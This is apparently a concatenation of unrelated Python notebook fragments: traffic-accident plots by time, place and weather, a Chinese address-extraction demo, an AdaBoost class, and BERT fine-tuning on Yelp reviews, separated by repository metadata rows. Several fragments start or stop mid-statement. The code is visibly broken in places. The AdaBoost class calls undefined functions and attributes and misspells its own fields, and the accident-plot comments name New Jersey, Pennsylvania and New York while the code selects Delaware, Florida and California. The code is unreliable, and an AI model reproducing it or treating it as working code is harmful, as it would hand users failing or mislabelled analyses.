# ##### B. Weekday versus weekend
# +
# Hourly distribution of accidents on weekdays in NJ, PA & NY (for the whole dataset)
# Set the size of the figure
fig= plt.figure(figsize=(15,6))
for i,state in enumerate(state_lst):
plt.subplot(1, 3, 1+i)
df[df['State']==state].groupby('Start_Weekday').count()['ID'].reindex(weekday_lst).plot(kind='bar',color=color_lst[i]).set_title(state)
plt.xlabel('')
# Only diplay ylabel on the leftmost plot
if i==0:
plt.ylabel('Number of accidents')
# +
# Accidents per day on weekdays/weekends in NJ, PA & NY
# Set the size of the figure
fig= plt.figure(figsize=(15,6))
# Divide the total number of accidents by the number of unique days
# Run a for loop for each state
for i,state in enumerate(state_lst):
# Set a sub plot
plt.subplot(1, 3, 1+i)
# Slice the dataframe for the specific state and weekday
df_temp=df[df['State']==state].groupby('Start_Weekday').count()['ID'].reindex(weekday_lst)
# checkpoint
# print('df_temp:', df_temp)
# print('weekday_num_state[i]:',weekday_num_state[i])
# Divid the number of accidents by the number of unique days, using list comprehension
df_temp2=[round(int(item1)/int(item2)) for item1,item2 in zip(df_temp,weekday_num_state[i])]
# checkpoint
# print('df_temp2:', df_temp2)
# Convert the list of pandas series for plot
df_temp2=pd.Series(df_temp2)
# Make a bar plot, using different color and set the title as the state
df_temp2.plot(kind='bar',color=color_lst[i]).set_title(state)
# Remove xlabels
plt.xlabel('')
# Replace the xticks with weekday
plt.xticks(np.arange(7),weekday_lst)
# Only diplay ylabel on the leftmost plot
if i==0:
plt.ylabel('Number of accidents')
# +
# Accidents per day on weekdays/weekends in NJ, PA & NY
# Set the size of the figure
# The severity for each location for each state; for each of the following locations, what's the severity of the accident?
feature='Start_Weekday'
fig_x=len(state_lst)
# Divide the total number of accidents by the number of unique days
# Set the size of the figure
fig= plt.figure(figsize=(5*fig_x,6))
# Cutoff percentage for display
pct_cutoff=2
# Define autopct: only display the value if the percentage is greater than the predefined cutoff value
def my_autopct(pct):
return ('%1.0f%%' % pct) if pct > pct_cutoff else ''
# Run a for loop for each state
for i,state in enumerate(state_lst):
# Set a sub plot
plt.subplot(1, 3, 1+i)
# Slice the dataframe for the specific state and weekday
df_temp=df[df['State']==state].groupby('Start_Weekday').count()['ID'].reindex(weekday_lst)
# checkpoint
# print('df_temp:', df_temp)
# print('weekday_num_state[i]:',weekday_num_state[i])
# Divid the number of accidents by the number of unique days, using list comprehension
df_temp2=[round(int(item1)/int(item2)) for item1,item2 in zip(df_temp,weekday_num_state[i])]
# checkpoint
# print('df_temp2:', df_temp2)
# Convert the list of pandas series for plot
df_temp2=pd.Series(df_temp2)
# Make a bar plot, using different color and set the title as the state
# df_temp2.plot(kind='bar',color=color_lst[i]).set_title(state)
# Define lables to go with the pie plot
labels = [n if v > pct_cutoff/100 else '' for n, v in zip(df_temp.index, df_temp)]
# Generate the pie plot
plt.pie(df_temp2, labels=labels, autopct=my_autopct, shadow=True)
# Set axis,label and title
plt.axis('equal')
plt.xlabel('Weekday/Weekend')
plt.title(state)
plt.tight_layout()
plt.show()
# -
# ### Step 4. Exploratory Data Analysis -- WWW (When, Where, & Weather)
#
# #### Question 1: When do most accidents happen?
#
# ##### C. Rush hour
# +
# Hourly distribution of accidents on all days, weekdays, & weekends in NJ, PA & NY
# Set the size of the figure
fig= plt.figure(figsize=(18,6))
# Plot all data together
plt.subplot(1, 3, 1)
# Plot the states of New Jersey, Pennsylvania, & New York on all days, group the data by hours and count the number of accident, reorder the data by hours, make lineplot with certain style and color
df[df['State']=='DE'].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='dashed',color='r')
df[df['State']=='FL'].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='dashdot',color='b')
df[df['State']=='CA'].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='solid',color='k')
# Set labels, limit, legend, title and xticks
plt.ylabel('Number of accidents')
plt.xlabel('Hour')
plt.legend(['DE','FL','CA'])
plt.title('All days')
plt.xticks(np.arange(0, 24, step=2))
# Weekdays
plt.subplot(1, 3, 2)
# Plot the states of New Jersey, Pennsylvania, & New York on weekdays, group the data by hours and count the number of accident, reorder the data by hours, make lineplot with certain style and color
df[(df['State']=='DE') & (df['Start_Weekday'].isin(weekday_lst[:5]))].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='dashed',color='r')
df[(df['State']=='FL') & (df['Start_Weekday'].isin(weekday_lst[:5]))].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='dashdot',color='b')
df[(df['State']=='CA') & (df['Start_Weekday'].isin(weekday_lst[:5]))].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='solid',color='k')
# Set labels, limit, legend, title and xticks
plt.xlabel('Hour')
plt.legend(['DE','FL','CA'])
plt.title('Weedays')
plt.xticks(np.arange(0, 24, step=2))
# Weekends
plt.subplot(1, 3, 3)
# Plot the state of New Jersey on weekends, group the data by hours and count the number of accident, reorder the data by hours, make lineplot with certain style and color
df[(df['State']=='DE') & (df['Start_Weekday'].isin(weekday_lst[5:]))].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='dashed',color='r')
# Plot the state of Pennsylvania on weekends, group the data by hours and count the number of accident, reorder the data by hours, make lineplot with certain style and color
df[(df['State']=='FL') & (df['Start_Weekday'].isin(weekday_lst[5:]))].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='dashdot',color='b')
# Plot the state of New York on weekends, group the data by hours and count the number of accident, reorder the data by hours, make lineplot with certain style and color
df[(df['State']=='CA') & (df['Start_Weekday'].isin(weekday_lst[5:]))].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='solid',color='k')
# Set labels, limit, legend, title and xticks
plt.xlabel('Hour')
plt.legend(['DE','FL','CA'])
plt.title('Weekends')
plt.xticks(np.arange(0, 24, step=2))
plt.tight_layout()
plt.show()
# +
# Hourly distribution of accidents (severity 2, 3, & 4) per day on all days, weekdays, & weekends in NJ, PA & NY
feature='Severity'
feature2=['All days', 'Weekdays','Weekends']
severity_lst=[2,3,4]
fig_x=len(state_lst)
fig_y=len(severity_lst)
fig_z=len(feature2)
# Set the size of the figure
fig= plt.figure(figsize=(5*fig_z,6*fig_y))
# Run a for loop for each weather condition and each state for all days together
for i,severity in enumerate(severity_lst):
### ###
# All days
# Set a sub plot
plt.subplot(fig_z, fig_y, i+1)
# Run a for loop for each state, all days
for j,state in enumerate(state_lst):
# Slice the dataframe for the specific state, weather condition and feature
df_temp=df[(df['State']==state) & (df['Severity']==severity)].groupby('Start_Hour').count()['ID'].reindex(hour_lst)
# Divid the number of accidents by the number of week days, using list comprehension
df_temp=df_temp/sum(weekday_num_state[i])
# Generate the scatter plot
df_temp.plot(linestyle=linestyle_lst[j], color=color_lst[j])
# Set labels, limit, legend, title and xticks
plt.xlabel('Hour')
plt.ylabel('Number of accidents')
# plt.xlim(0, 23)
plt.legend(['DE','FL','CA'])
plt.title('All days'+': severity-'+str(severity))
plt.xticks(np.arange(0, 24, step=2))
### ###
# Weekdays
# Set a sub plot
plt.subplot(fig_z, fig_y, i+1+fig_y)
# Run a for loop for each state, weekdays
for j,state in enumerate(state_lst):
# Slice the dataframe for the specific state, weather condition and feature
df_temp=df[(df['State']==state) & (df['Severity']==severity) & (df['Start_Weekday'].isin(weekday_lst[:5]))].groupby('Start_Hour').count()['ID'].reindex(hour_lst)
# Divid the number of accidents by the number of weekdays (Mon-Fri), using list comprehension
df_temp=df_temp/sum(weekday_num_state[i][:5])
# Generate the scatter plot
df_temp.plot(linestyle=linestyle_lst[j], color=color_lst[j])
# Set labels, limit, legend, title and xticks
plt.xlabel('Hour')
plt.ylabel('Number of accidents')
# plt.xlim(0, 23)
plt.legend(['DE','FL','CA'])
plt.title('Weekdays'+': severity-'+str(severity))
plt.xticks(np.arange(0, 24, step=2))
### ###
# Weekends
# Set a sub plot
plt.subplot(fig_z, fig_y, i+1+fig_y+fig_y)
# Run a for loop for each state, weekdays
for j,state in enumerate(state_lst):
# Slice the dataframe for the specific state, weather condition and feature
df_temp=df[(df['State']==state) & (df['Severity']==severity) & (df['Start_Weekday'].isin(weekday_lst[5:]))].groupby('Start_Hour').count()['ID'].reindex(hour_lst)
# Divid the number of accidents by the number of week days, using list comprehension
df_temp=df_temp/sum(weekday_num_state[i][5:])
# Generate the scatter plot
df_temp.plot(linestyle=linestyle_lst[j], color=color_lst[j])
# Set labels, limit, legend, title and xticks
plt.xlabel('Hour')
plt.ylabel('Number of accidents')
# plt.xlim(0, 23)
plt.legend(['DE','FL','CA'])
plt.title('Weekends'+': severity-'+str(severity))
plt.xticks(np.arange(0, 24, step=2))
plt.tight_layout()
plt.show()
# +
# Hourly distribution of accidents on weekdays in NJ, PA & NY
# Set the size of the figure
fig= plt.figure(figsize=(30,6))
n=5
# Make subplots on each weekday with a for loop
for i in range(n):
plt.subplot(1, 5, i+1)
# Plot the state of New Jersey on weekdays, group the data by hours and count the number of accident, reorder the data by hours, make lineplot with certain style and color
df[(df['State']=='DE') & (df['Start_Weekday']==weekday_lst[i])].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='dashed',color='r')
# Plot the state of Pennsylvania on weekdays, group the data by hours and count the number of accident, reorder the data by hours, make lineplot with certain style and color
df[(df['State']=='FL') & (df['Start_Weekday']==weekday_lst[i])].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='dashdot',color='b')
# Plot the state of New York on weekdays, group the data by hours and count the number of accident, reorder the data by hours, make lineplot with certain style and color
df[(df['State']=='CA') & (df['Start_Weekday']==weekday_lst[i])].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='solid',color='k')
# Set labels, limit, legend, title and xticks
plt.xlabel('Hour')
plt.legend(['DE','FL','CA'])
plt.title(weekday_lst_full[i])
plt.xticks(np.arange(0, 24, step=2))
# Only diplay ylabel on the leftmost plot
if i==0:
plt.ylabel('Number of accidents')
plt.tight_layout()
plt.show()
# +
# Hourly distribution of accidents on weekends in NJ, PA & NY
# Set the size of the figure
fig= plt.figure(figsize=(12,6))
# Make subplots on each weekday with a for loop
for i in range(2):
# Set the subplot
plt.subplot(1, 2, i+1)
# Plot the state of New Jersey on weekends, group the data by hours and count the number of accident, reorder the data by hours, make lineplot with certain style and color
df[(df['State']=='DE') & (df['Start_Weekday']==weekday_lst[i+5])].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='dashed',color='r')
# Plot the state of Pennsylvania on weekends, group the data by hours and count the number of accident, reorder the data by hours, make lineplot with certain style and color
df[(df['State']=='FL') & (df['Start_Weekday']==weekday_lst[i+5])].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='dashdot',color='b')
# Plot the state of New York on weekends, group the data by hours and count the number of accident, reorder the data by hours, make lineplot with certain style and color
df[(df['State']=='CA') & (df['Start_Weekday']==weekday_lst[i+5])].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='solid',color='k')
# Set labels, limit, legend, title and xticks
plt.xlabel('Hour')
plt.legend(['DE','FL','CA'])
plt.title(weekday_lst_full[i+5])
plt.xticks(np.arange(0, 24, step=2))
# Only diplay ylabel on the leftmost plot
if i==0:
plt.ylabel('Number of accidents')
plt.tight_layout()
plt.show()
# -
# ### Step 4. Exploratory Data Analysis -- WWW (When, Where, & Weather)
#
# #### Question 2: Where do most accidents happen?
#
# ##### A. County
# +
# The county distribution of accidents for each state
feature='County'
# Set the size of the figure
fig= plt.figure(figsize=(15,6))
# Cutoff percentage for display
pct_cutoff=2.5
# Define autopct: only display the value if the percentage is greater than the predefined cutoff value
def my_autopct(pct):
return ('%1.0f%%' % pct) if pct > pct_cutoff else ''
# Run a for loop for each state
for i,state in enumerate(state_lst):
# Set a sub plot
plt.subplot(1, 3, 1+i)
# Slice the dataframe for the specific state and feature
df_temp=df[df['State']==state][feature].value_counts(normalize=True).round(8)
# Define lables to go with the pie plot
labels = [n if v > pct_cutoff/100 else ''
for n, v in zip(df_temp.index, df_temp)]
# Generate the pie plot
plt.pie(df_temp, labels=labels, autopct=my_autopct, shadow=True)
# Set axis,label and title
plt.axis('equal')
plt.xlabel(feature)
plt.title(state)
plt.tight_layout()
plt.show()
# -
# ### Step 4. Exploratory Data Analysis -- WWW (When, Where, & Weather)
#
# #### Question 2: Where do most accidents happen?
#
# ##### B. City
df[df['State']=='NJ']['City'].value_counts(normalize=True)
# +
# The city distribution of accidents for each state
feature='City'
# Set the size of the figure
fig= plt.figure(figsize=(15,6))
# Cutoff percentage for display
pct_cutoff=2.5
# Define autopct: only display the value if the percentage is greater than the predefined cutoff value
def my_autopct(pct):
return ('%1.0f%%' % pct) if pct > pct_cutoff else ''
# Run a for loop for each state
for i,state in enumerate(state_lst):
# Set a sub plot
plt.subplot(1, 3, 1+i)
# Slice the dataframe for the specific state and feature
df_temp=df[df['State']==state][feature].value_counts(normalize=True).round(8)
# Define lables to go with the pie plot
labels = [n if v > pct_cutoff/100 else ''
for n, v in zip(df_temp.index, df_temp)]
# Generate the pie plot
plt.pie(df_temp, labels=labels, autopct=my_autopct, shadow=True)
# Set axis,label and title
plt.axis('equal')
plt.xlabel(feature)
plt.title(state)
plt.xlabel(feature)
plt.show()
# -
# ### Step 4. Exploratory Data Analysis -- WWW (When, Where, & Weather)
#
# #### Question 2: Where do most accidents happen?
#
# ##### C. Zipcode
# +
# The zip code distribution of accidents for each state
feature='Zipcode'
# Set the size of the figure
fig= plt.figure(figsize=(15,6))
# Cutoff percentage for display
pct_cutoff=2.5
# Define autopct: only display the value if the percentage is greater than the predefined cutoff value
def my_autopct(pct):
return ('%1.0f%%' % pct) if pct > pct_cutoff else ''
# Run a for loop for each state
for i,state in enumerate(state_lst):
# Set a sub plot
plt.subplot(1, 3, 1+i)
# Slice the dataframe for the specific state and feature
df_temp=df[df['State']==state][feature].value_counts(normalize=True).round(8)
# Define lables to go with the pie plot
labels = [n if v > pct_cutoff/100 else ''
for n, v in zip(df_temp.index, df_temp)]
# Generate the pie plot
plt.pie(df_temp, labels=labels, autopct=my_autopct, shadow=True)
# Set axis,label and title
plt.axis('equal')
plt.xlabel(feature)
plt.title(state)
plt.xlabel(feature)
plt.show()
# -
# ### Step 4. Exploratory Data Analysis -- WWW (When, Where, & Weather)
#
# #### Question 2: Where do most accidents happen?
#
# ##### D. Street side
# +
# The relative side of the street (Right/Left) in address field for each state.
# Set the size of the figure
fig= plt.figure(figsize=(15,6))
labels=['Right','Left']
# Run a for loop for each state
for i,state in enumerate(state_lst):
# Set a sub plot
plt.subplot(1, 3, 1+i)
# Slice the dataframe for the specific state and weekday
df_side=df[df['State']==state]['Side'].value_counts(normalize=True).round(2)[:2]
plt.pie(df_side, labels=labels, autopct='%1.0f%%', shadow=True)
plt.axis('equal')
plt.xlabel('Street side')
plt.title('{}'.format(state))
plt.show()
# -
# ### Step 4. Exploratory Data Analysis -- WWW (When, Where, & Weather)
#
# #### Question 2: Where do most accidents happen?
#
# ##### E. Location
# +
# The location of accidents for each state
# Where are the accidents?
feature='Accident location'
# Set the state as the index
df.set_index('State',drop=True,inplace=True)
# State is the index when selecting bool type data as df_bool
df_bool=df.select_dtypes(include=['bool'])
# Reset the index of the original data for other calculations
df.reset_index(inplace=True)
# Set the size of the figure
fig= plt.figure(figsize=(15,6))
# Cutoff percentage for display
pct_cutoff=2.5
# Define autopct: only display the value if the percentage is greater than the predefined cutoff value
def my_autopct(pct):
return ('%1.0f%%' % pct) if pct > pct_cutoff else ''
# Run a for loop for each state
for i,state in enumerate(state_lst):
# Set a sub plot
plt.subplot(1, 3, 1+i)
# Slice the dataframe for the specific state and feature
df_temp=df_bool[df_bool.index==state]
df_temp=(df_temp.sum(axis=0)/df_temp.sum(axis=0).sum()).sort_values()
# Define lables to go with the pie plot
labels = [n if v > pct_cutoff/100 else ''
for n, v in zip(df_temp.index, df_temp)]
# Generate the pie plot
plt.pie(df_temp, labels=labels, autopct=my_autopct, shadow=True)
# Set axis,label and title
plt.axis('equal')
plt.xlabel(feature)
plt.title(state)
plt.xlabel(feature)
plt.show()
# +
# Select the data with a list of columns as State, Severity and the location list
# List the locations with data types as boolean
col_sel=list(df.dtypes[df.dtypes=='bool'].index)
# Append stat and severity to the list
col_sel.append('State')
col_sel.append('Severity')
# Slice the dataframe with the list above
df_sel=df[col_sel]
# The severity for each location for each state; for each of the following locations, what's the severity of the accident?
feature='Severity'
loc_lst=['Traffic_Signal','Junction', 'Crossing']
fig_x=len(state_lst)
fig_y=len(loc_lst)
# Set the size of the figure
fig= plt.figure(figsize=(5*fig_x,6*fig_y))
# Cutoff percentage for display
pct_cutoff=2
# Define autopct: only display the value if the percentage is greater than the predefined cutoff value
def my_autopct(pct):
return ('%1.0f%%' % pct) if pct > pct_cutoff else ''
# Run a for loop for each location
for i,loc in enumerate(loc_lst):
# Run a for loop for each state
for j,state in enumerate(state_lst):
# Set a sub plot
plt.subplot(fig_y, fig_x, i*fig_x+j+1)
# Slice the dataframe for the specific state, weather condition and feature
df_temp=df_sel
df_temp=df_temp[(df_temp['State']==state) & (df_temp[loc]==True)]
df_temp=df_temp[feature].value_counts(normalize=True).round(2)
# Define lables to go with the pie plot
labels = [n if v > pct_cutoff/100 else ''
for n, v in zip(df_temp.index, df_temp)]
# Generate the pie plot
plt.pie(df_temp, labels=labels, autopct=my_autopct, shadow=True)
# Set axis,label and title
plt.axis('equal')
plt.xlabel(feature)
plt.title(state+': '+loc)
plt.tight_layout()
plt.show()
# -
# ### Step 4. Exploratory Data Analysis -- WWW (When, Where, & Weather)
#
# #### Question 3: With what weather condition do most accidents happen?
#
# ##### A. Top weather conditions with accidents
df[df['State']==state]['Weather_Condition'].value_counts(normalize=True).round(5)
# +
# The weather condition for each state
feature='Weather_Condition'
# Set the size of the figure
fig= plt.figure(figsize=(15,6))
# Cutoff percentage for display
pct_cutoff=2
# Define autopct: only display the value if the percentage is greater than the predefined cutoff value
def my_autopct(pct):
return ('%1.0f%%' % pct) if pct > pct_cutoff else ''
# Run a for loop for each state
for i,state in enumerate(state_lst):
# Set a sub plot
plt.subplot(1, 3, 1+i)
# Slice the dataframe for the specific state and feature
df_temp=df[df['State']==state][feature].value_counts(normalize=True).round(2)
# Define lables to go with the pie plot
labels = [n if v > pct_cutoff/100 else ''
for n, v in zip(df_temp.index, df_temp)]
# Generate the pie plot
plt.pie(df_temp, labels=labels, autopct=my_autopct, shadow=True)
# Set axis,label and title
plt.axis('equal')
plt.xlabel(feature)
plt.title(state)
plt.tight_layout()
plt.show()
# -
# ### Step 4. Exploratory Data Analysis -- WWW (When, Where, & Weather)
#
# #### Question 3: With what weather condition do most accidents happen?
#
# ##### B. Accident severity for the top 3 weather conditions
# +
# The weather condition for each state; for each of the following weather conditions (Clear, Overcast and Mostly Cloudy), what's the severity?
feature='Severity'
weather_lst=['Clear','Overcast','Mostly Cloudy']
fig_x=len(state_lst)
fig_y=len(weather_lst)
# Set the size of the figure
fig= plt.figure(figsize=(5*fig_x,6*fig_y))
# Cutoff percentage for display
pct_cutoff=2
# Define autopct: only display the value if the percentage is greater than the predefined cutoff value
def my_autopct(pct):
return ('%1.0f%%' % pct) if pct > pct_cutoff else ''
# Run a for loop for each weather condition
for i,weather in enumerate(weather_lst):
# Run a for loop for each state
for j,state in enumerate(state_lst):
# Set a sub plot
plt.subplot(fig_y, fig_x, i*fig_x+j+1)
# Slice the dataframe for the specific state, weather condition and feature
df_temp=df[(df['State']==state) & (df['Weather_Condition']==weather)][feature].value_counts(normalize=True).round(2)
# Define lables to go with the pie plot
labels = [n if v > pct_cutoff/100 else ''
for n, v in zip(df_temp.index, df_temp)]
# Generate the pie plot
plt.pie(df_temp, labels=labels, autopct=my_autopct, shadow=True)
# Set axis,label and title
plt.axis('equal')
plt.xlabel(feature)
plt.title(state+': '+weather)
plt.tight_layout()
plt.show()
# -
# ### Step 4. Exploratory Data Analysis -- WWW (When, Where, & Weather)
#
# #### Question 3: With what weather condition do most accidents happen?
#
# ##### C. Weather conditions for each accident severity (2, 3, & 4)
# +
# The weather condition for each state; for each of the following Severity (2,3,4), what's the weather conditions?
feature='Weather_Condition'
severity_lst=[2,3,4]
fig_x=len(state_lst)
fig_y=len(severity_lst)
# Set the size of the figure
fig= plt.figure(figsize=(5*fig_x,6*fig_y))
# Cutoff percentage for display
pct_cutoff=2
# Define autopct: only display the value if the percentage is greater than the predefined cutoff value
def my_autopct(pct):
return ('%1.0f%%' % pct) if pct > pct_cutoff else ''
# Run a for loop for each weather condition
for i,severity in enumerate(severity_lst):
# Run a for loop for each state
for j,state in enumerate(state_lst):
# Set a sub plot
plt.subplot(fig_y, fig_x, i*fig_x+j+1)
# Slice the dataframe for the specific state, weather condition and feature
df_temp=df[(df['State']==state) & (df['Severity']==severity)][feature].value_counts(normalize=True).round(2)
# Define lables to go with the pie plot
labels = [n if v > pct_cutoff/100 else ''
for n, v in zip(df_temp.index, df_temp)]
# Generate the pie plot
plt.pie(df_temp, labels=labels, autopct=my_autopct, shadow=True)
# Set axis,label and title
plt.axis('equal')
plt.xlabel(feature)
plt.title(state+': severity-'+str(severity))
plt.tight_layout()
plt.show()
| 43,247 |
/20210520addressparser中文地址提取/addressparser地址.ipynb
|
a2e9926a5a1cf47853a73ea03758b46fe19ec848
|
[] |
no_license
|
thunderhit/DaDengAndHisPython
|
https://github.com/thunderhit/DaDengAndHisPython
| 35 | 21 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 16,133 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# addressparser一个用于提取简体中文字符串中省,市和区并能够进行映射,检验和简单绘图的python模块
# !pip3 install addressparser==0.2.1
# ## 省市区提取
# 默认采用全文模式,不进行分词,直接全文匹配,这样速度慢,准确率高。
# +
import addressparser as addr
locations = ["徐汇区虹漕路461号58号楼5楼",
"泉州市洛江区万安塘西工业区",
"朝阳区北苑华贸城"]
df1 = addr.transform(locations)
df1
# -
# ## 地址经纬度、省市县级联关系查询
## 查询经纬度信息
addr.latlng[('北京市','北京市','朝阳区')]
## 查询含有"鼓楼区"的全部地址
addr.area_map.get_relational_addrs('鼓楼区')
# 注:
# - city_map可以用来查询含有某个市的全部地址,
# - province_map可以用来查询含有某个省的全部地址
## 查询含有"江苏省", "鼓楼区"的全部地址
addr.province_area_map.get_relational_addrs(('江苏省', '鼓楼区'))
# ## 大批量地址处理
#读取数据
import pandas as pd
df = pd.read_csv("addr.csv")
df.dropna(inplace=True) #去重空地址
df.head()
len(df)
df['原始地址'].nunique()
addr_df = addr.transform(df["原始地址"])
addr_df
#合并df 和 addr_df 两个数据
processed = pd.concat([df, addr_df], axis=1)
processed.head()
| 1,138 |
/AdaBoost/AdaBoost.ipynb
|
2e8eafe97973f4dcd42134d2261927e3d1bd4d0c
|
[] |
no_license
|
DMak21/ML-Project
|
https://github.com/DMak21/ML-Project
| 0 | 0 | null | 2019-04-25T17:42:52 | 2019-04-25T10:33:33 |
Jupyter Notebook
|
Jupyter Notebook
| false | false |
.py
| 2,733 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np
import pandas as pd
class AdaBoost(object):
def __init__(self, x=None, y=None, T=10):
self.x = x
self.n = self.x.shape[0]
self.y = y
self.weights = np.ones(self.n)/self.n
self.epsilon = []
self.alpha = []
self.classifiers = []
self.num_trees = T
def lsweights(self,x,y):
xt = np.transpose(x)
xtx = np.dot(xt, x)
if xtx.shape[0] != xtx.shape[1]:
raise ValueError('Needs to be a square matrix for inverse')
inv = np.linalg.inv(xtx)
xty = np.dot(xt, y)
return np.dot(inv, xty)
def predict(self,x):
class_output = np.dot(x, self.weights)
return np.sign(class_output)
def boost(self,data):
for t in range(self.num_trees):
output = np.random.choice(self.n, self.n, p=self.weights)
self.weights = lsweights(data,y)
Y_pred = predict(data)
e_t = np.sum((Y_pred != self.y) * self.weights)
if e_t > 0.5:
ls.weights = -ls.weights
Y_pred = predict(self.X_train)
e_t = np.sum((Y_pred != self.y_train) * self.weights)
self.epsilont.append(e_t)
alpha_t = 0.5 * np.log((1 - e_t)/e_t)
self.alphas.append(alpha_t)
self.classifiers.append(ls)
# print alpha_t
self.weights *= np.exp(-alpha_t* Y_pred * self.y)
self.weights /= np.sum(self.weights)
# -
).tolist() + test_df['text'].str.len().tolist(),cumulative=True, density=True, bins=40)
plt.xlim(left=90, right=130)
plt.show()
train_df.head()
def count_parameters(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
hidden_size = 200
# +
tokenizer = BertTokenizer.from_pretrained('bert-base-cased')
model = BertForSequenceClassification.from_pretrained('bert-base-cased', num_labels=hidden_size)
model.classifier.add_module('bert_activation', nn.Tanh())
model.classifier.add_module('prediction', nn.Linear(hidden_size, 5))
FINE_TUNE = True
print(f'Total model trainable parameters {count_parameters(model)}')
if FINE_TUNE:
for param in model.bert.parameters():
param.requires_grad = False
for param in model.classifier.parameters():
param.requires_grad = True
print(f'Total head trainable parameters {count_parameters(model)}')
model.cuda();
# -
model.classifier
tokenized = tokenizer.tokenize(' I am parachuting with you')
print(tokenized)
print(tokenizer.encode(tokenized, add_special_tokens=False))
print(tokenizer.encode(tokenized, add_special_tokens=True))
# https://huggingface.co/transformers/main_classes/processors.html
def get_features(df, text_col, label_col):
l = [InputExample(guid=idx, text_a=df.loc[idx, text_col], label=df.loc[idx, label_col]) for
idx, row in tqdm(df.iterrows(), total=df.shape[0])]
features = glue_convert_examples_to_features(examples=l,
tokenizer=tokenizer,
max_length=300,
label_list = df[label_col].values,
output_mode='regression')
all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
all_attention_mask = torch.tensor([f.attention_mask for f in features], dtype=torch.long)
all_token_type_ids = torch.tensor([f.token_type_ids for f in features], dtype=torch.long)
all_labels = torch.tensor([f.label-1 for f in features], dtype=torch.long)
dataset = TensorDataset(all_input_ids, all_attention_mask, all_labels)
return dataset
train_dataset = get_features(train_df, 'text', 'stars')
test_dataset = get_features(test_df, 'text', 'stars')
val_idx, train_idx = train_test_split(np.arange(len(train_dataset)), random_state=4, train_size=0.1)
total_size = len(train_dataset)
val_dataset = TensorDataset(*train_dataset[val_idx])
train_dataset = TensorDataset(*train_dataset[train_idx])
assert total_size == len(val_dataset) + len(train_dataset)
# works
model(input_ids=train_dataset[:2][0].cuda(),
attention_mask=train_dataset[:2][1].cuda(),
labels=train_dataset[:2][2].cuda());
# +
batch_size = 16
gradient_every = 32
assert batch_size <= gradient_every and gradient_every % batch_size == 0
accumulation_steps = gradient_every//batch_size
train_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True)
val_dataloader = DataLoader(val_dataset, batch_size=batch_size*2, shuffle=False)
test_dataloader = DataLoader(test_dataset, batch_size=batch_size*2, shuffle=False)
epochs = 25
lr = 0.002
optimizer = AdamW(model.classifier.parameters(), lr=lr)
# -
tr_losses = []
v_losses = []
# scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=0, num_training_steps=len(train_data_loader)*epochs)
for epoch in tnrange(epochs, desc='epoch'):
""" Training stage """
epoch_tr_losses = []
print(f'epoch {epoch+1}')
for k, (input_ids, attention_mask, labels) in enumerate(tqdm(train_dataloader, total=len(train_dataloader), desc='batch')):
feed_dict = {'input_ids': input_ids.cuda(),
'attention_mask': attention_mask.cuda(),
'labels': labels.cuda()}
loss, _ = model(**feed_dict)
# gradient accumulation
epoch_tr_losses.append(loss.item())
loss = loss/accumulation_steps
loss.backward()
if (k + 1) % accumulation_steps == 0:
optimizer.step()
model.zero_grad()
tr_losses.append(np.mean(epoch_tr_losses))
print(f'train NLL loss: {np.mean(epoch_tr_losses)}')
""" Validation stage """
epoch_v_losses = []
with torch.no_grad():
for k, (input_ids, attention_mask, labels) in enumerate(tqdm(val_dataloader, total=len(val_dataloader), desc='val batch')):
feed_dict = {'input_ids': input_ids.cuda(),
'attention_mask': attention_mask.cuda(),
'labels': labels.cuda()}
loss, pred = model(**feed_dict)
epoch_v_losses.append(loss.item())
v_losses.append(np.mean(epoch_v_losses))
print(f'validation BCE loss: {np.mean(epoch_v_losses)}')
torch.save(model.classifier.state_dict(), f'/kaggle/working/yelp-head{epoch}.pt')
batch_predictions, batch_actual = [], []
with torch.no_grad():
for k, (input_ids, attention_mask, labels) in enumerate(tqdm(test_dataloader, total=len(test_dataloader), desc='val batch')):
feed_dict = {'input_ids': input_ids.cuda(),
'attention_mask': attention_mask.cuda()}
pred = model(**feed_dict)[0].cpu()
batch_predictions.append(pred.numpy())
batch_actual.append(labels)
# +
predictions = np.array([i for k in batch_predictions for i in k ])
predictions = np.argmax(predictions, axis=1)
actual = np.array([i for k in batch_actual for i in k ])
# -
from sklearn.metrics import f1_score
f1_score(actual, predictions, average='micro')
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Blues):
"""
This function prints and plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
"""
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, cm[i, j],
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.ylabel('True label')
plt.xlabel('Predicted label')
# compute the confusion matrix
